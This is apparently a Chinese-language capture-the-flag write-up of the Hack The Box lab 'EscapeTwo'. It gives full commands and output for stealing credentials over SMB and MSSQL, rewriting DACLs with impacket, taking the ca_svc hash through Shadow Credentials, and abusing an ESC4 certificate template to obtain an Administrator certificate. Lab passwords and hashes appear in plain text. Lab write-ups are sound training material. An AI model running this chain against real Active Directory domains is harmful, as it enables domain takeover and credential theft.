Hackthebox - EscapeTwo

(Updated: )
,

EscapeTwo

10.10.11.51
info-card

MACHINE INFORMATION
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

开头给出凭据 rose:KxEPkKe6R8su

smb fuzzing

使用凭据进入 smb 服务后找到两个 xlsx 文件,里面记录了以下内容,看起来要爆破的量不小。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<t xml:space="preserve">angela</t>
    </si>
    <si>
        <t xml:space="preserve">0fwz7Q4mSpurIt99</t>
    </si>
<t xml:space="preserve">oscar</t>
    </si>
    <si>
        <t xml:space="preserve">86LxLBMgEWaKUnBG</t>
    </si>
<t xml:space="preserve">kevin</t>
    </si>
    <si>
        <t xml:space="preserve">Md9Wlq1E5bZnVDVo</t>
    </si>
<t xml:space="preserve">sa</t>
    </si>
    <si>
        <t xml:space="preserve">MSSQLP@ssw0rd!</t>
    </si>

angela:0fwz7Q4mSpurIt99
oscar:86LxLBMgEWaKUnBG
kevin:Md9Wlq1E5bZnVDVo
sa:MSSQLP@ssw0rd!

另一个 xlsx 提供的信息似乎不是很有用,二进制的打印机设置文件。

爆破

smb-cme
oscar:86LxLBMgEWaKUnBG 可以登陆 smb

MSSQL

login-success
sa:MSSQLP@ssw0rd! 成功登陆 mssql
steal-hash
ntlm-sqlsvc

hashcat 爆不出来,换换思路
mssqlclient
sql-Configuration.INI
SEQUEL\sql_svc:WqSZAF6CysDQbGb3
winrm-pwned
ryan:WqSZAF6CysDQbGb3
user-flag

提权

dc-shell
PSRemote 不太行
certipy
同步了下时间
targetedKerberoast.py
hashcat 爆不出来x2

BloodHound

Shadow Credentials

bl1

1
2
3
4
5
6
7
8
9
10
11
12
$ impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' 'SEQUEL.HTB'/'ryan':'WqSZAF6CysDQbGb3'
[*] Current owner information below                                                                                                                         
[*] - SID: S-1-5-21-548670397-972687484-3496335370-1114                                                                                                     
[*] - sAMAccountName: ryan                                                                                                                                  
[*] - distinguishedName: CN=Ryan Howard,CN=Users,DC=sequel,DC=htb                                                                                           
[*] OwnerSid modified successfully!

$ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250114-235146.bak
[*] DACL modified successfully!

首先修改权限为 FullControl, 然后通过 Shadow Credentials 获取 NT hash 

1
2
3
4
5
6
7
8
9
10
11
12
$ pywhisker -d "sequel.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" --target "ca_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 6c14e8ad-83fd-f650-3381-bde53c035c06
[*] Updating the msDS-KeyCredentialLink attribute of ca_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: 9xUY4Qsk.pfx
[*] Must be used with password: OWezRO9HwuwZlhSAstBH
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
1
2
3
4
5
6
7
8
9
10
11
$ python3 gettgtpkinit.py sequel.htb/ca_svc -cert-pfx 9xUY4Qsk.pfx -pfx-pass OWezRO9HwuwZlhSAstBH ccache
2025-01-14 21:12:28,845 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-01-14 21:12:28,851 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-01-14 21:12:29,126 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-01-14 21:12:29,126 minikerberos INFO     fabb6e6becd4efaed3a6740783d54c9bdc405f097f351433fa9b3bb3852883ba
INFO:minikerberos:fabb6e6becd4efaed3a6740783d54c9bdc405f097f351433fa9b3bb3852883ba
2025-01-14 21:12:29,131 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file
1
2
3
4
5
6
7
$ python3 getnthash.py sequel.htb/ca_svc -key fabb6e6becd4efaed3a6740783d54c9bdc405f097f351433fa9b3bb3852883ba
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC 
Recovered NT Hash
3b181b914e7a9d5508ea1e20bc2b7fce

就有了 ca_svc 的 NT hash,这里也可以用 certipy 一步到位 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ certipy shadow auto -u [email protected] -p 'WqSZAF6CysDQbGb3' -account 'ca_svc'                                                          23:36:23 [2/469]
Certipy v4.8.2 - by Oliver Lyak (ly4k)                                                                                                                      
                                                                                                                                                            
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'e3236247-9699-f7ee-b545-5f22eb1c1b2c'
[*] Adding Key Credential with device ID 'e3236247-9699-f7ee-b545-5f22eb1c1b2c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'e3236247-9699-f7ee-b545-5f22eb1c1b2c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

ADCS-ESC4

bl2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
$ certipy find -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.10.11.51  -target-ip 10.10.11.51 -vulnerable -stdout              
                                                                             
Certipy v4.8.2 - by Oliver Lyak (ly4k)                                                                                                                     
                                                                                                                                                           
[*] Finding certificate templates                                                                                                                          
[*] Found 34 certificate templates                                                                                                                         
[*] Finding certificate authorities                                          
[*] Found 1 certificate authority                                            
[*] Found 12 enabled certificate templates                                                                                                                 
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA                                                                                           
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied
 error.                                                                                                                                                    
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP                                                                                            
[*] Got CA configuration for 'sequel-DC01-CA'                                                                                                              
[*] Enumeration output:                                                                                                                                    
Certificate Authorities                                                      
  0                                                                          
    CA Name                             : sequel-DC01-CA                                                                                                   
    DNS Name                            : DC01.sequel.htb                                                                                                  
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb                                                                             
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3   
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00          
    Certificate Validity End            : 2124-06-08 17:00:40+00:00                                                                                        
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
1
2
3
4
5
6
7
$ certipy template -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -template DunderMifflinAuthentication -save-old                         
                                                                                                                                                           
Certipy v4.8.2 - by Oliver Lyak (ly4k)                                                                                                                     
                                                                                                                                                           
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'                                                        
[*] Updating certificate template 'DunderMifflinAuthentication'                                                                                            
[*] Successfully updated 'DunderMifflinAuthentication'
1
2
3
4
5
6
7
8
9
10
11
$ certipy req -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target-ip 10.10.11.51 -template DunderMifflinAuthentication -upn [email protected] -dns 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k) 

[*] Requesting certificate via RPC
[*] Successfully requested certificate 
[*] Request ID is 25
[*] Got certificate with multiple identifications
    UPN: '[email protected]'
    DNS Host Name: '10.10.11.51'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_10.pfx'

certipy3

结语

第一次拿下域渗透相关的 Active Machine,BloodHound 在后续这部分提供了很大的思路上的帮助,没接触过这部分也可以按照思路去学习和熟悉。
前面几乎都是信息搜索和用户枚举,挺有意思的。期待后面的 Season 7 机器。
done